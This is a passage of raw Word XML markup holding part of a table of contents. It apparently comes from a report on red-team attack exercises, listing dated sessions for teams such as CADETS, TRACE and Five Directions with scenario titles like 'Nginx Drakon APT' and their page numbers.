            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70975AB4" w14:textId="5E41914B" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600100" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>09:32 -- TA1 CADETS 1 and 2 -- Nginx Drakon APT</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600100 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>89</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="797FA9F1" w14:textId="1A62EEA2" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600101" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.3.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101 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>89</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31A77AD0" w14:textId="4FBC561F" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600102" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.3.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102 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>89</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="011F4593" w14:textId="07C168F9" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600103" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.3.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600103 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>89</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27BCBADF" w14:textId="3D6F2B68" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600104" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11:03 -- Five Directions 1 -- Firefox BITS Verifier Drakon APT</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600104 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E59C5C6" w14:textId="1C482E7F" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600105" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.4.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105 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2504E3DB" w14:textId="0F6B5C4C" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600106" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.4.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106 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47A61D1D" w14:textId="1BF0674F" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600107" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.4.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Benign Activity Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600107 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AB7CDD8" w14:textId="0052DA6B" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600108" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>05/17/2019 – TRACE, CADETS, ClearScope, and Five Directions</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600108 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>94</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0860B3A2" w14:textId="0C94C6EB" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600109" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Schedule</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600109 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>94</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00D8115E" w14:textId="44294E9B" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600110" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600110 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>94</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C1EE982" w14:textId="38FAB358" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600111" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>09:05 -- TRACE 1 and 2 – Azazel APT (Failed)</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600111 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>94</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48F1206E" w14:textId="6A27BA23" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600112" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.3.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112 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>94</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
